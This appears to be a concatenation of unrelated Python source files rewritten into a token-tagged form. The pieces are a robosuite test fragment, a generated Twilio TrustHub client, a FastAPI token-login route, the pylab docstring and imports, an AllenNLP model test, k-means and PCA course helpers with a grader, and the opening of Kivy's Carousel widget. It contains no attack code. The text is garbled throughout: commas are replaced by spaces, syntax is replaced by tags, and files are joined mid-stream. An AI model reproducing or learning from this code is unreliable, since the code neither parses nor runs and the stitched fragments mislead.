SawyerLift<class_stmt>UnnormalizedEnv(SawyerLift)<block_start>@property<def_stmt>dof self<block_start><return>5<block_end>@property<def_stmt>action_spec self<block_start>low,high=np.ones(self.dof)<times>-2.0 np.ones(self.dof)<times>2.0<line_sep><return>low high<block_end><block_end>env=UnnormalizedEnv(has_renderer=<false> has_offscreen_renderer=<false> use_camera_obs=<false>)<with_stmt>self.assertRaises(AssertionError)<block_start>adapter=RobosuiteAdapter(domain=<none> task=<none> env=env)<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
# coding=utf-8 r""" This code was generated by \ / _ _ _| _ _ | (_)\/(_)(_|\/| |(/_ v1.0.0 / / """<import_from_stmt>twilio.base deserialize<import_from_stmt>twilio.base values<import_from_stmt>twilio.base.instance_context InstanceContext<import_from_stmt>twilio.base.instance_resource InstanceResource<import_from_stmt>twilio.base.list_resource ListResource<import_from_stmt>twilio.base.page Page<class_stmt>TrustProductsChannelEndpointAssignmentList(ListResource)<block_start><def_stmt>__init__ self version trust_product_sid<block_start>""" Initialize the TrustProductsChannelEndpointAssignmentList :param Version version: Version that contains the resource :param trust_product_sid: The unique string that identifies the CustomerProfile resource. :returns: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentList :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentList """<line_sep>super(TrustProductsChannelEndpointAssignmentList self).__init__(version)<line_sep># Path Solution self._solution={'trust_product_sid':trust_product_sid }<line_sep>self._uri='/TrustProducts/{trust_product_sid}/ChannelEndpointAssignments'.format(**self._solution)<block_end><def_stmt>create self channel_endpoint_type channel_endpoint_sid<block_start>""" Create the TrustProductsChannelEndpointAssignmentInstance :param unicode channel_endpoint_type: The type of channel endpoint :param unicode channel_endpoint_sid: The sid of an channel endpoint :returns: The created TrustProductsChannelEndpointAssignmentInstance :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentInstance """<line_sep>data=values.of({'ChannelEndpointType':channel_endpoint_type 'ChannelEndpointSid':channel_endpoint_sid })<line_sep>payload=self._version.create(method='POST' uri=self._uri data=data )<line_sep><return>TrustProductsChannelEndpointAssignmentInstance(self._version payload trust_product_sid=self._solution['trust_product_sid'] )<block_end><def_stmt>stream self channel_endpoint_sid=values.unset channel_endpoint_sids=values.unset limit=<none> page_size=<none><block_start>""" Streams TrustProductsChannelEndpointAssignmentInstance records from the API as a generator stream. This operation lazily loads records as efficiently as possible until the limit is reached. The results are returned as a generator, so this operation is memory efficient. :param unicode channel_endpoint_sid: The sid of an channel endpoint :param unicode channel_endpoint_sids: comma separated list of channel endpoint sids :param int limit: Upper limit for the number of records to return. stream() guarantees to never return more than limit. Default is no limit :param int page_size: Number of records to fetch per request, when not set will use the default value of 50 records. If no page_size is defined but a limit is defined, stream() will attempt to read the limit with the most efficient page size, i.e. min(limit, 1000) :returns: Generator that will yield up to limit results :rtype: list[twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentInstance] """<line_sep>limits=self._version.read_limits(limit page_size)<line_sep>page=self.page(channel_endpoint_sid=channel_endpoint_sid channel_endpoint_sids=channel_endpoint_sids page_size=limits['page_size'] )<line_sep><return>self._version.stream(page limits['limit'])<block_end><def_stmt>list self channel_endpoint_sid=values.unset channel_endpoint_sids=values.unset limit=<none> page_size=<none><block_start>""" Lists TrustProductsChannelEndpointAssignmentInstance records from the API as a list. Unlike stream(), this operation is eager and will load `limit` records into memory before returning. :param unicode channel_endpoint_sid: The sid of an channel endpoint :param unicode channel_endpoint_sids: comma separated list of channel endpoint sids :param int limit: Upper limit for the number of records to return. list() guarantees never to return more than limit. Default is no limit :param int page_size: Number of records to fetch per request, when not set will use the default value of 50 records. If no page_size is defined but a limit is defined, list() will attempt to read the limit with the most efficient page size, i.e. min(limit, 1000) :returns: Generator that will yield up to limit results :rtype: list[twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentInstance] """<line_sep><return>list(self.stream(channel_endpoint_sid=channel_endpoint_sid channel_endpoint_sids=channel_endpoint_sids limit=limit page_size=page_size ))<block_end><def_stmt>page self channel_endpoint_sid=values.unset channel_endpoint_sids=values.unset page_token=values.unset page_number=values.unset page_size=values.unset<block_start>""" Retrieve a single page of TrustProductsChannelEndpointAssignmentInstance records from the API. Request is executed immediately :param unicode channel_endpoint_sid: The sid of an channel endpoint :param unicode channel_endpoint_sids: comma separated list of channel endpoint sids :param str page_token: PageToken provided by the API :param int page_number: Page Number, this value is simply for client state :param int page_size: Number of records to return, defaults to 50 :returns: Page of TrustProductsChannelEndpointAssignmentInstance :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentPage """<line_sep>data=values.of({'ChannelEndpointSid':channel_endpoint_sid 'ChannelEndpointSids':channel_endpoint_sids 'PageToken':page_token 'Page':page_number 'PageSize':page_size })<line_sep>response=self._version.page(method='GET' uri=self._uri params=data )<line_sep><return>TrustProductsChannelEndpointAssignmentPage(self._version response self._solution)<block_end><def_stmt>get_page self target_url<block_start>""" Retrieve a specific page of TrustProductsChannelEndpointAssignmentInstance records from the API. Request is executed immediately :param str target_url: API-generated URL for the requested results page :returns: Page of TrustProductsChannelEndpointAssignmentInstance :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentPage """<line_sep>response=self._version.domain.twilio.request('GET' target_url )<line_sep><return>TrustProductsChannelEndpointAssignmentPage(self._version response self._solution)<block_end><def_stmt>get self sid<block_start>""" Constructs a TrustProductsChannelEndpointAssignmentContext :param sid: The unique string that identifies the resource :returns: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentContext :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentContext """<line_sep><return>TrustProductsChannelEndpointAssignmentContext(self._version trust_product_sid=self._solution['trust_product_sid'] sid=sid )<block_end><def_stmt>__call__ self sid<block_start>""" Constructs a TrustProductsChannelEndpointAssignmentContext :param sid: The unique string that identifies the resource :returns: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentContext :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentContext """<line_sep><return>TrustProductsChannelEndpointAssignmentContext(self._version trust_product_sid=self._solution['trust_product_sid'] sid=sid )<block_end><def_stmt>__repr__ self<block_start>""" Provide a friendly representation :returns: Machine friendly representation :rtype: str """<line_sep><return>'<Twilio.Trusthub.V1.TrustProductsChannelEndpointAssignmentList>'<block_end><block_end><class_stmt>TrustProductsChannelEndpointAssignmentPage(Page)<block_start><def_stmt>__init__ self version response solution<block_start>""" Initialize the TrustProductsChannelEndpointAssignmentPage :param Version version: Version that contains the resource :param Response response: Response from the API :param trust_product_sid: The unique string that identifies the CustomerProfile resource. :returns: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentPage :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentPage """<line_sep>super(TrustProductsChannelEndpointAssignmentPage self).__init__(version response)<line_sep># Path Solution self._solution=solution<block_end><def_stmt>get_instance self payload<block_start>""" Build an instance of TrustProductsChannelEndpointAssignmentInstance :param dict payload: Payload response from the API :returns: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentInstance :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentInstance """<line_sep><return>TrustProductsChannelEndpointAssignmentInstance(self._version payload trust_product_sid=self._solution['trust_product_sid'] )<block_end><def_stmt>__repr__ self<block_start>""" Provide a friendly representation :returns: Machine friendly representation :rtype: str """<line_sep><return>'<Twilio.Trusthub.V1.TrustProductsChannelEndpointAssignmentPage>'<block_end><block_end><class_stmt>TrustProductsChannelEndpointAssignmentContext(InstanceContext)<block_start><def_stmt>__init__ self version trust_product_sid sid<block_start>""" Initialize the TrustProductsChannelEndpointAssignmentContext :param Version version: Version that contains the resource :param trust_product_sid: The unique string that identifies the resource. :param sid: The unique string that identifies the resource :returns: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentContext :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentContext """<line_sep>super(TrustProductsChannelEndpointAssignmentContext self).__init__(version)<line_sep># Path Solution self._solution={'trust_product_sid':trust_product_sid 'sid':sid }<line_sep>self._uri='/TrustProducts/{trust_product_sid}/ChannelEndpointAssignments/{sid}'.format(**self._solution)<block_end><def_stmt>fetch self<block_start>""" Fetch the TrustProductsChannelEndpointAssignmentInstance :returns: The fetched TrustProductsChannelEndpointAssignmentInstance :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentInstance """<line_sep>payload=self._version.fetch(method='GET' uri=self._uri )<line_sep><return>TrustProductsChannelEndpointAssignmentInstance(self._version payload trust_product_sid=self._solution['trust_product_sid'] sid=self._solution['sid'] )<block_end><def_stmt>delete self<block_start>""" Deletes the TrustProductsChannelEndpointAssignmentInstance :returns: True if delete succeeds, False otherwise :rtype: bool """<line_sep><return>self._version.delete(method='DELETE' uri=self._uri )<block_end><def_stmt>__repr__ self<block_start>""" Provide a friendly representation :returns: Machine friendly representation :rtype: str """<line_sep>context=' '.join('{}={}'.format(k v)<for>k,v self._solution.items())<line_sep><return>'<Twilio.Trusthub.V1.TrustProductsChannelEndpointAssignmentContext {}>'.format(context)<block_end><block_end><class_stmt>TrustProductsChannelEndpointAssignmentInstance(InstanceResource)<block_start><def_stmt>__init__ self version payload trust_product_sid sid=<none><block_start>""" Initialize the TrustProductsChannelEndpointAssignmentInstance :returns: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentInstance :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentInstance """<line_sep>super(TrustProductsChannelEndpointAssignmentInstance self).__init__(version)<line_sep># Marshaled Properties self._properties={'sid':payload.get('sid') 'trust_product_sid':payload.get('trust_product_sid') 'account_sid':payload.get('account_sid') 'channel_endpoint_type':payload.get('channel_endpoint_type') 'channel_endpoint_sid':payload.get('channel_endpoint_sid') 'date_created':deserialize.iso8601_datetime(payload.get('date_created')) 'url':payload.get('url') }<line_sep># Context self._context=<none><line_sep>self._solution={'trust_product_sid':trust_product_sid 'sid':sid<or>self._properties['sid'] }<block_end>@property<def_stmt>_proxy self<block_start>""" Generate an instance context for the instance, the context is capable of performing various actions. All instance actions are proxied to the context :returns: TrustProductsChannelEndpointAssignmentContext for this TrustProductsChannelEndpointAssignmentInstance :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentContext """<if_stmt>self._context<is><none><block_start>self._context=TrustProductsChannelEndpointAssignmentContext(self._version trust_product_sid=self._solution['trust_product_sid'] sid=self._solution['sid'] )<block_end><return>self._context<block_end>@property<def_stmt>sid self<block_start>""" :returns: The unique string that identifies the resource :rtype: unicode """<line_sep><return>self._properties['sid']<block_end>@property<def_stmt>trust_product_sid self<block_start>""" :returns: The unique string that identifies the CustomerProfile resource. :rtype: unicode """<line_sep><return>self._properties['trust_product_sid']<block_end>@property<def_stmt>account_sid self<block_start>""" :returns: The SID of the Account that created the resource :rtype: unicode """<line_sep><return>self._properties['account_sid']<block_end>@property<def_stmt>channel_endpoint_type self<block_start>""" :returns: The type of channel endpoint :rtype: unicode """<line_sep><return>self._properties['channel_endpoint_type']<block_end>@property<def_stmt>channel_endpoint_sid self<block_start>""" :returns: The sid of an channel endpoint :rtype: unicode """<line_sep><return>self._properties['channel_endpoint_sid']<block_end>@property<def_stmt>date_created self<block_start>""" :returns: The ISO 8601 date and time in GMT when the resource was created :rtype: datetime """<line_sep><return>self._properties['date_created']<block_end>@property<def_stmt>url self<block_start>""" :returns: The absolute URL of the Identity resource :rtype: unicode """<line_sep><return>self._properties['url']<block_end><def_stmt>fetch self<block_start>""" Fetch the TrustProductsChannelEndpointAssignmentInstance :returns: The fetched TrustProductsChannelEndpointAssignmentInstance :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentInstance """<line_sep><return>self._proxy.fetch()<block_end><def_stmt>delete self<block_start>""" Deletes the TrustProductsChannelEndpointAssignmentInstance :returns: True if delete succeeds, False otherwise :rtype: bool """<line_sep><return>self._proxy.delete()<block_end><def_stmt>__repr__ self<block_start>""" Provide a friendly representation :returns: Machine friendly representation :rtype: str """<line_sep>context=' '.join('{}={}'.format(k v)<for>k,v self._solution.items())<line_sep><return>'<Twilio.Trusthub.V1.TrustProductsChannelEndpointAssignmentInstance {}>'.format(context)<block_end><block_end>
<import_from_stmt>datetime timedelta<import_from_stmt>fastapi APIRouter Depends HTTPException status<import_from_stmt>fastapi.security OAuth2PasswordRequestForm<import_from_stmt>..config settings<import_from_stmt>..security Token User authenticate_user create_access_token get_user <line_sep>ACCESS_TOKEN_EXPIRE_MINUTES=settings.security.access_token_expire_minutes<line_sep>router=APIRouter()<line_sep>@router.post("/token" response_model=Token)<async_keyword><def_stmt>login_for_access_token form_data:OAuth2PasswordRequestForm=Depends() <block_start>user=authenticate_user(get_user form_data.username form_data.password)<if_stmt><not>user<or><not>isinstance(user User)<block_start><raise>HTTPException(status_code=status.HTTP_401_UNAUTHORIZED detail="Incorrect username or password" headers={"WWW-Authenticate":"Bearer"} )<block_end>access_token_expires=timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES)<line_sep>access_token=create_access_token(data={"sub":user.username} expires_delta=access_token_expires)<line_sep><return>{"access_token":access_token "token_type":"bearer"}<block_end>
""" This is a procedural interface to the matplotlib object-oriented plotting library. The following plotting commands are provided; the majority have MATLAB |reg| [*]_ analogs and similar arguments. .. |reg| unicode:: 0xAE _Plotting commands acorr - plot the autocorrelation function annotate - annotate something in the figure arrow - add an arrow to the axes axes - Create a new axes axhline - draw a horizontal line across axes axvline - draw a vertical line across axes axhspan - draw a horizontal bar across axes axvspan - draw a vertical bar across axes axis - Set or return the current axis limits autoscale - turn axis autoscaling on or off, and apply it bar - make a bar chart barh - a horizontal bar chart broken_barh - a set of horizontal bars with gaps box - set the axes frame on/off state boxplot - make a box and whisker plot violinplot - make a violin plot cla - clear current axes clabel - label a contour plot clf - clear a figure window clim - adjust the color limits of the current image close - close a figure window colorbar - add a colorbar to the current figure cohere - make a plot of coherence contour - make a contour plot contourf - make a filled contour plot csd - make a plot of cross spectral density delaxes - delete an axes from the current figure draw - Force a redraw of the current figure errorbar - make an errorbar graph figlegend - make legend on the figure rather than the axes figimage - make a figure image figtext - add text in figure coords figure - create or change active figure fill - make filled polygons findobj - recursively find all objects matching some criteria gca - return the current axes gcf - return the current figure gci - get the current image, or None getp - get a graphics property grid - set whether gridding is on hist - make a histogram hold - set the axes hold state ioff - turn interaction mode off ion - turn interaction mode on isinteractive - return True if interaction mode is on imread - load image file into array imsave - save array as an image file imshow - plot image data ishold - return the hold state of the current axes legend - make an axes legend locator_params - adjust parameters used in locating axis ticks loglog - a log log plot matshow - display a matrix in a new figure preserving aspect margins - set margins used in autoscaling pause - pause for a specified interval pcolor - make a pseudocolor plot pcolormesh - make a pseudocolor plot using a quadrilateral mesh pie - make a pie chart plot - make a line plot plot_date - plot dates plotfile - plot column data from an ASCII tab/space/comma delimited file pie - pie charts polar - make a polar plot on a PolarAxes psd - make a plot of power spectral density quiver - make a direction field (arrows) plot rc - control the default params rgrids - customize the radial grids and labels for polar savefig - save the current figure scatter - make a scatter plot setp - set a graphics property semilogx - log x axis semilogy - log y axis show - show the figures specgram - a spectrogram plot spy - plot sparsity pattern using markers or image stem - make a stem plot subplot - make one subplot (numrows, numcols, axesnum) subplots - make a figure with a set of (numrows, numcols) subplots subplots_adjust - change the params controlling the subplot positions of current figure subplot_tool - launch the subplot configuration tool suptitle - add a figure title table - add a table to the plot text - add some text at location x,y to the current axes thetagrids - customize the radial theta grids and labels for polar tick_params - control the appearance of ticks and tick labels ticklabel_format - control the format of tick labels title - add a title to the current axes tricontour - make a contour plot on a triangular grid tricontourf - make a filled contour plot on a triangular grid tripcolor - make a pseudocolor plot on a triangular grid triplot - plot a triangular grid xcorr - plot the autocorrelation function of x and y xlim - set/get the xlimits ylim - set/get the ylimits xticks - set/get the xticks yticks - set/get the yticks xlabel - add an xlabel to the current axes ylabel - add a ylabel to the current axes autumn - set the default colormap to autumn bone - set the default colormap to bone cool - set the default colormap to cool copper - set the default colormap to copper flag - set the default colormap to flag gray - set the default colormap to gray hot - set the default colormap to hot hsv - set the default colormap to hsv jet - set the default colormap to jet pink - set the default colormap to pink prism - set the default colormap to prism spring - set the default colormap to spring summer - set the default colormap to summer winter - set the default colormap to winter spectral - set the default colormap to spectral _Event handling connect - register an event handler disconnect - remove a connected event handler _Matrix commands cumprod - the cumulative product along a dimension cumsum - the cumulative sum along a dimension detrend - remove the mean or besdt fit line from an array diag - the k-th diagonal of matrix diff - the n-th differnce of an array eig - the eigenvalues and eigen vectors of v eye - a matrix where the k-th diagonal is ones, else zero find - return the indices where a condition is nonzero fliplr - flip the rows of a matrix up/down flipud - flip the columns of a matrix left/right linspace - a linear spaced vector of N values from min to max inclusive logspace - a log spaced vector of N values from min to max inclusive meshgrid - repeat x and y to make regular matrices ones - an array of ones rand - an array from the uniform distribution [0,1] randn - an array from the normal distribution rot90 - rotate matrix k*90 degress counterclockwise squeeze - squeeze an array removing any dimensions of length 1 tri - a triangular matrix tril - a lower triangular matrix triu - an upper triangular matrix vander - the Vandermonde matrix of vector x svd - singular value decomposition zeros - a matrix of zeros _Probability normpdf - The Gaussian probability density function rand - random numbers from the uniform distribution randn - random numbers from the normal distribution _Statistics amax - the maximum along dimension m amin - the minimum along dimension m corrcoef - correlation coefficient cov - covariance matrix mean - the mean along dimension m median - the median along dimension m norm - the norm of vector x prod - the product along dimension m ptp - the max-min along dimension m std - the standard deviation along dimension m asum - the sum along dimension m ksdensity - the kernel density estimate _Time series analysis bartlett - M-point Bartlett window blackman - M-point Blackman window cohere - the coherence using average periodiogram csd - the cross spectral density using average periodiogram fft - the fast Fourier transform of vector x hamming - M-point Hamming window hanning - M-point Hanning window hist - compute the histogram of x kaiser - M length Kaiser window psd - the power spectral density using average periodiogram sinc - the sinc function of array x _Dates date2num - convert python datetimes to numeric representation drange - create an array of numbers for date plots num2date - convert numeric type (float days since 0001) to datetime _Other angle - the angle of a complex array griddata - interpolate irregularly distributed data to a regular grid load - Deprecated--please use loadtxt. loadtxt - load ASCII data into array. polyfit - fit x, y to an n-th order polynomial polyval - evaluate an n-th order polynomial roots - the roots of the polynomial coefficients in p save - Deprecated--please use savetxt. savetxt - save an array to an ASCII file. trapz - trapezoidal integration __end .. [*] MATLAB is a registered trademark of The MathWorks, Inc. """<import_from_future_stmt> absolute_import division print_function unicode_literals <import_stmt>six<import_stmt>sys warnings<import_from_stmt>matplotlib.cbook flatten is_string_like exception_to_str silent_list iterable dedent<import_stmt>matplotlib<as>mpl<line_sep># make mpl.finance module available for backwards compatability, in case folks # using pylab interface depended on not having to import it <import_stmt>matplotlib.finance<import_from_stmt>matplotlib.dates date2num num2date datestr2num strpdate2num drange epoch2num num2epoch mx2num DateFormatter IndexDateFormatter DateLocator RRuleLocator YearLocator MonthLocator WeekdayLocator DayLocator HourLocator MinuteLocator SecondLocator rrule MO TU WE TH FR SA SU YEARLY MONTHLY WEEKLY DAILY HOURLY MINUTELY SECONDLY relativedelta<import_stmt>matplotlib.dates# Do we need this at all? # bring all the symbols in so folks can import them from # pylab in one fell swoop ## We are still importing too many things from mlab; more cleanup is needed. <import_from_stmt>matplotlib.mlab griddata stineman_interp slopes inside_poly poly_below poly_between is_closed_polygon path_length distances_along_curve vector_lengths<import_from_stmt>matplotlib.mlab window_hanning window_none detrend demean detrend_mean detrend_none detrend_linear entropy normpdf find longest_contiguous_ones longest_ones prepca prctile prctile_rank center_matrix rk4 bivariate_normal get_xyz_where get_sparse_matrix dist dist_point_to_segment segments_intersect fftsurr movavg exp_safe amap rms_flat l1norm l2norm norm_flat frange identity base_repr binary_repr log2 ispower2 rec_append_fields rec_drop_fields rec_join csv2rec rec2csv isvector<import_stmt>matplotlib.mlab<as>mlab<import_stmt>matplotlib.cbook<as>cbook<import_from_stmt>numpy *<import_from_stmt>numpy.fft *<import_from_stmt>numpy.random *<import_from_stmt>numpy.linalg *<import_from_stmt>matplotlib.pyplot *<line_sep># provide the recommended module abbrevs in the pylab namespace <import_stmt>matplotlib.pyplot<as>plt<import_stmt>numpy<as>np<import_stmt>numpy.ma<as>ma<line_sep># don't let numpy's datetime hide stdlib <import_stmt>datetime<line_sep># This is needed, or bytes will be numpy.random.bytes from # "from numpy.random import *" above bytes=__builtins__['bytes']<line_sep>
# pylint: disable=no-self-use,invalid-name <import_from_future_stmt> division<import_from_future_stmt> absolute_import<import_stmt>numpy<import_from_stmt>numpy.testing assert_almost_equal<import_from_stmt>allennlp.common.testing ModelTestCase<class_stmt>TestESIM(ModelTestCase)<block_start><def_stmt>setUp self<block_start>super(TestESIM self).setUp()<line_sep>self.set_up_model(self.FIXTURES_ROOT/u'esim'/u'experiment.json' self.FIXTURES_ROOT/u'data'/u'snli.jsonl')<block_end><def_stmt>test_forward_pass_runs_correctly self<block_start>training_tensors=self.dataset.as_tensor_dict()<line_sep>output_dict=self.model(**training_tensors)<line_sep>assert_almost_equal(numpy.sum(output_dict[u"label_probs"][0].data.numpy() -1) 1 decimal=6)<block_end><def_stmt>test_model_can_train_save_and_load self<block_start>self.ensure_model_can_train_save_and_load(self.param_file)<block_end><def_stmt>test_batch_predictions_are_consistent self<block_start>self.ensure_batch_predictions_are_consistent()<block_end><block_end>
<import_stmt>sys<import_stmt>numpy<as>np<import_from_stmt>matplotlib pyplot<import_from_stmt>matplotlib.animation FuncAnimation<import_stmt>matplotlib<as>mpl<line_sep>sys.path.append('..')<import_from_stmt>submission SubmissionBase<def_stmt>displayData X example_width=<none> figsize=(10 10)<block_start>""" Displays 2D data in a nice grid. Parameters ---------- X : array_like The input data of size (m x n) where m is the number of examples and n is the number of features. example_width : int, optional THe width of each 2-D image in pixels. If not provided, the image is assumed to be square, and the width is the floor of the square root of total number of pixels. figsize : tuple, optional A 2-element tuple indicating the width and height of figure in inches. """<line_sep># Compute rows, cols <if_stmt>X.ndim<eq>2<block_start>m,n=X.shape<block_end><elif_stmt>X.ndim<eq>1<block_start>n=X.size<line_sep>m=1<line_sep>X=X[<none>]# Promote to a 2 dimensional array <block_end><else_stmt><block_start><raise>IndexError('Input X should be 1 or 2 dimensional.')<block_end>example_width=example_width<or>int(np.round(np.sqrt(n)))<line_sep>example_height=int(n/example_width)<line_sep># Compute number of items to display display_rows=int(np.floor(np.sqrt(m)))<line_sep>display_cols=int(np.ceil(m/display_rows))<line_sep>fig,ax_array=pyplot.subplots(display_rows display_cols figsize=figsize)<line_sep>fig.subplots_adjust(wspace=0.025 hspace=0.025)<line_sep>ax_array=[ax_array]<if>m<eq>1<else>ax_array.ravel()<for_stmt>i,ax enumerate(ax_array)<block_start>ax.imshow(X[i].reshape(example_height example_width order='F') cmap='gray')<line_sep>ax.axis('off')<block_end><block_end><def_stmt>featureNormalize X<block_start>""" Normalizes the features in X returns a normalized version of X where the mean value of each feature is 0 and the standard deviation is 1. This is often a good preprocessing step to do when working with learning algorithms. Parameters ---------- X : array_like An dataset which is a (m x n) matrix, where m is the number of examples, and n is the number of dimensions for each example. Returns ------- X_norm : array_like The normalized input dataset. mu : array_like A vector of size n corresponding to the mean for each dimension across all examples. sigma : array_like A vector of size n corresponding to the standard deviations for each dimension across all examples. """<line_sep>mu=np.mean(X axis=0)<line_sep>X_norm=X-mu<line_sep>sigma=np.std(X_norm axis=0 ddof=1)<line_sep>X_norm<augdiv>sigma<line_sep><return>X_norm mu sigma<block_end><def_stmt>plotProgresskMeans i X centroid_history idx_history<block_start>""" A helper function that displays the progress of k-Means as it is running. It is intended for use only with 2D data. It plots data points with colors assigned to each centroid. With the previous centroids, it also plots a line between the previous locations and current locations of the centroids. Parameters ---------- i : int Current iteration number of k-means. Used for matplotlib animation function. X : array_like The dataset, which is a matrix (m x n). Note since the plot only supports 2D data, n should be equal to 2. centroid_history : list A list of computed centroids for all iteration. idx_history : list A list of computed assigned indices for all iterations. """<line_sep>K=centroid_history[0].shape[0]<line_sep>pyplot.gcf().clf()<line_sep>cmap=pyplot.cm.rainbow<line_sep>norm=mpl.colors.Normalize(vmin=0 vmax=2)<for_stmt>k range(K)<block_start>current=np.stack([c[k :]<for>c centroid_history[:i+1]] axis=0)<line_sep>pyplot.plot(current[: 0] current[: 1] '-Xk' mec='k' lw=2 ms=10 mfc=cmap(norm(k)) mew=2)<line_sep>pyplot.scatter(X[: 0] X[: 1] c=idx_history[i] cmap=cmap marker='o' s=8<power>2 linewidths=1 )<block_end>pyplot.grid(<false>)<line_sep>pyplot.title('Iteration number %d'%(i+1))<block_end><def_stmt>runkMeans X centroids findClosestCentroids computeCentroids max_iters=10 plot_progress=<false><block_start>""" Runs the K-means algorithm. Parameters ---------- X : array_like The data set of size (m, n). Each row of X is a single example of n dimensions. The data set is a total of m examples. centroids : array_like Initial centroid location for each clusters. This is a matrix of size (K, n). K is the total number of clusters and n is the dimensions of each data point. findClosestCentroids : func A function (implemented by student) reference which computes the cluster assignment for each example. computeCentroids : func A function(implemented by student) reference which computes the centroid of each cluster. max_iters : int, optional Specifies the total number of interactions of K-Means to execute. plot_progress : bool, optional A flag that indicates if the function should also plot its progress as the learning happens. This is set to false by default. Returns ------- centroids : array_like A (K x n) matrix of the computed (updated) centroids. idx : array_like A vector of size (m,) for cluster assignment for each example in the dataset. Each entry in idx is within the range [0 ... K-1]. anim : FuncAnimation, optional A matplotlib animation object which can be used to embed a video within the jupyter notebook. This is only returned if `plot_progress` is `True`. """<line_sep>K=centroids.shape[0]<line_sep>idx=<none><line_sep>idx_history=[]<line_sep>centroid_history=[]<for_stmt>i range(max_iters)<block_start>idx=findClosestCentroids(X centroids)<if_stmt>plot_progress<block_start>idx_history.append(idx)<line_sep>centroid_history.append(centroids)<block_end>centroids=computeCentroids(X idx K)<block_end><if_stmt>plot_progress<block_start>fig=pyplot.figure()<line_sep>anim=FuncAnimation(fig plotProgresskMeans frames=max_iters interval=500 repeat_delay=2 fargs=(X centroid_history idx_history))<line_sep><return>centroids idx anim<block_end><return>centroids idx<block_end><class_stmt>Grader(SubmissionBase)# Random Test Cases <block_start>X=np.sin(np.arange(1 166)).reshape(15 11 order='F')<line_sep>Z=np.cos(np.arange(1 122)).reshape(11 11 order='F')<line_sep>C=Z[:5 :]<line_sep>idx=np.arange(1 16)%3<def_stmt>__init__ self<block_start>part_names=['Find Closest Centroids (k-Means)' 'Compute Centroid Means (k-Means)' 'PCA' 'Project Data (PCA)' 'Recover Data (PCA)']<line_sep>super().__init__('k-means-clustering-and-pca' part_names)<block_end><def_stmt>__iter__ self<block_start><for_stmt>part_id range(1 6)<block_start><try_stmt><block_start>func=self.functions[part_id]<line_sep># Each part has different expected arguments/different function <if_stmt>part_id<eq>1<block_start>res=1+func(self.X self.C)<block_end><elif_stmt>part_id<eq>2<block_start>res=func(self.X self.idx 3)<block_end><elif_stmt>part_id<eq>3<block_start>U,S=func(self.X)<line_sep>res=np.hstack([U.ravel('F') np.diag(S).ravel('F')]).tolist()<block_end><elif_stmt>part_id<eq>4<block_start>res=func(self.X self.Z 5)<block_end><elif_stmt>part_id<eq>5<block_start>res=func(self.X[: :5] self.Z 5)<block_end><else_stmt><block_start><raise>KeyError<block_end><yield>part_id res<block_end><except_stmt>KeyError<block_start><yield>part_id 0<block_end><block_end><block_end><block_end>
''' Carousel ======== .. versionadded:: 1.4.0 The :class:`Carousel` widget provides the classic mobile-friendly carousel view where you can swipe between slides. You can add any content to the carousel and use it horizontally or verticaly. The carousel can display pages in loop or not. Example:: class Example1(App): def build(self): carousel = Carousel(direction='right') for i in range(10): src = "http://placehold.it/480x270.png&text=slide-%d&.png" % i image = Factory.AsyncImage(source=src, allow_stretch=True) carousel.add_widget(image) return carousel Example1().run() .. versionchanged:: 1.5.0 The carousel now supports active children, like the :class:`~kivy.uix.scrollview.ScrollView`. It will detect a swipe gesture according to :attr:`Carousel.scroll_timeout` and :attr:`Carousel.scroll_distance`. In addition, the container used for adding a slide is now hidden in the API. We made a mistake by exposing it to the user. The impacted properties are: :attr:`Carousel.slides`, :attr:`Carousel.current_slide`, :attr:`Carousel.previous_slide` and :attr:`Carousel.next_slide`. '''<line_sep>__all__=('Carousel' )<import_from_stmt>functools partial<import_from_stmt>kivy.clock Clock<import_from_stmt>kivy.factory Factory<import_from_stmt>kivy.animation Animation<import_from_stmt>kivy.uix.stencilview StencilView<import_from_stmt>kivy.uix.relativelayout RelativeLayout<import_from_stmt>kivy.properties BooleanProperty OptionProperty AliasProperty NumericProperty ListProperty ObjectProperty StringProperty<class_stmt>Carousel(StencilView)<block_start>'''Carousel class. See module documentation for more information. '''<line_sep>slides=ListProperty([])<line_sep>'''List of slides inside the Carousel. The slides are added 